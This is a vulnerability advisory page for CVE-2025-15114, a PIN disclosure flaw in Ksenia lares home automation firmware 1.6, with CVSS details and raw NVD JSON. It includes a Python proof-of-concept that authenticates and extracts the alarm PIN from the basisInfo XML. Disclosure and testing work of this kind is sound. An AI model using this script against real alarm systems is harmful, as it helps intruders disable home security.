Security Vulnerability Report
CVE-2025-15114 CVSS 9.8 CRITICAL

CVE-2025-15114

Published: 2025-12-30 23:15:50
Last Modified: 2026-03-11 20:16:14

Description

Ksenia Security lares (legacy model) Home Automation version 1.6 contains a critical security flaw that exposes the alarm system PIN in the 'basisInfo' XML file after authentication. Attackers can retrieve the PIN from the server response to bypass security measures and disable the alarm system without additional authentication.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:kseniasecurity:lares_firmware:1.6:*:*:*:*:*:*:* - VULNERABLE
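cpe:2.3:h:kseniasecurity:lares:4.0:*:*:*:*:*:*:* - NOT VULNERABLE (hardware platform: the configuration is an AND node, so this is the device the vulnerable 1.6 firmware runs on, not an unaffected product)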
Ksenia Security lares (legacy model) Home Automation version < 1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
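#!/usr/bin/env python3
"""
CVE-2025-15114 PoC - Ksenia Security lares PIN Code Disclosure

This PoC demonstrates how to retrieve the alarm system PIN from basisInfo XML.

The check logs in with a valid account, requests the basisInfo document and
reports whether it carries a PIN element. The PIN is returned to the caller
but masked in console output, so it does not end up in terminal scrollback
or captured logs.
"""

import sys
import xml.etree.ElementTree as ET

import requests

# Tag spellings probed for the PIN element, in order of preference.
_PIN_TAGS = ("pin", "Pin", "PIN")


def _find_pin_element(root):
    """Return the first PIN element found under *root*, or None."""
    for tag in _PIN_TAGS:
        element = root.find(f".//{tag}")
        # Compare with None explicitly: an Element without children is falsy,
        # so chaining find() calls with `or` discards a matching leaf element.
        if element is not None:
            return element
    return None


def exploit_cve_2025_15114(target_url, username, password):
    """
    Check whether the basisInfo XML response discloses the alarm PIN.

    Args:
        target_url: Base URL of the Ksenia lares system
        username: Valid username for authentication
        password: Valid password for authentication

    Returns:
        PIN code if successful, None otherwise
    """
    # A trailing slash on the base URL would otherwise yield "//api/...".
    base_url = target_url.rstrip("/")

    # NOTE(review): both paths are kept exactly as this PoC was published.
    # The advisory text only names a 'basisInfo' XML file, so confirm the
    # paths against the advisory before reading a failure as "not affected".
    login_url = f"{base_url}/api/login"
    basisinfo_url = f"{base_url}/api/basisInfo"
    login_data = {"username": username, "password": password}

    try:
        # Certificate verification stays at the requests default (enabled);
        # a device with a self-signed certificate fails here with an SSLError,
        # which is reported below as a request failure.
        with requests.Session() as session:
            # Step 1: Authenticate to the system
            response = session.post(login_url, json=login_data, timeout=10)
            if response.status_code != 200:
                print(
                    "[-] Authentication failed with status code: "
                    f"{response.status_code}"
                )
                return None
            print("[+] Authentication successful")

            # Step 2: Request basisInfo XML endpoint
            response = session.get(basisinfo_url, timeout=10)
            if response.status_code != 200:
                print(f"[-] Failed to retrieve basisInfo: {response.status_code}")
                return None
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

    # Step 3: Parse XML response to extract PIN
    # NOTE(review): the body comes from the device under test and xml.etree is
    # not hardened against maliciously constructed XML; defusedxml is the
    # usual replacement if the device itself cannot be trusted.
    try:
        root = ET.fromstring(response.text)
    except ET.ParseError as e:
        print(f"[-] Failed to parse XML response: {e}")
        return None

    pin_element = _find_pin_element(root)
    if pin_element is None:
        print("[-] PIN element not found in response")
        # The raw body is not echoed: it may hold other configuration secrets.
        print(
            f"[-] Response root element: <{root.tag}>, "
            f"{len(response.text)} characters (body not printed)"
        )
        return None

    # An empty element has text None; treat that as "no PIN disclosed" so the
    # function never reports VULNERABLE while returning nothing usable.
    pin_code = (pin_element.text or "").strip()
    if not pin_code:
        print("[-] PIN element present but empty")
        return None

    print(f"[!] VULNERABLE! PIN Code found: {'*' * len(pin_code)} (masked)")
    print("[+] Attackers can now disable the alarm system using this PIN")
    return pin_code


if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage: python cve_2025_15114_poc.py <target_url> <username> <password>")
        print("Example: python cve_2025_15114_poc.py https://192.168.1.100 admin admin123")
        sys.exit(1)

    # NOTE(review): the password arrives via argv, so it is visible in shell
    # history and in the process list while the script runs.
    target, user, passwd = sys.argv[1:4]

    print("[*] CVE-2025-15114 PoC - Ksenia Security lares PIN Disclosure")
    print(f"[*] Target: {target}")
    print("[*] Attempting to retrieve alarm PIN...")

    pin = exploit_cve_2025_15114(target, user, passwd)

    if pin:
        masked = "*" * len(pin)
        print(f"\n[+] SUCCESS: Alarm system PIN '{masked}' has been extracted")
        print("[!] This PIN can be used to disable the alarm system")
    else:
        print("\n[-] FAILED: Could not retrieve PIN code")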

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15114", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:50.070", "lastModified": "2026-03-11T20:16:13.593", "vulnStatus": "Modified", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Ksenia Security lares (legacy model) Home Automation version 1.6 contains a critical security flaw that exposes the alarm system PIN in the 'basisInfo' XML file after authentication. Attackers can retrieve the PIN from the server response to bypass security measures and disable the alarm system without additional authentication."}, {"lang": "es", "value": "Ksenia Security Lares 4.0 Home Automation versión 1.6 contiene una falla de seguridad crítica que expone el PIN del sistema de alarma en el archivo XML 'basisInfo' después de la autenticación. Los atacantes pueden recuperar el PIN de la respuesta del servidor para eludir las medidas de seguridad y deshabilitar el sistema de alarma sin autenticación adicional."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", 
"modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-403"}]}, {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-668"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:kseniasecurity:lares_firmware:1.6:*:*:*:*:*:*:*", "matchCriteriaId": "DF94F084-2F13-427A-9CB5-9E3E95621C8B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:kseniasecurity:lares:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "DDE71F37-880F-4534-80FF-A2BE3D8E2AD4"}]}]}], "references": [{"url": "https://www.vulncheck.com/advisories/ksenia-security-lares-home-automation-pin-exposure-vulnerability", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": 
"https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5929.php", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5929.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}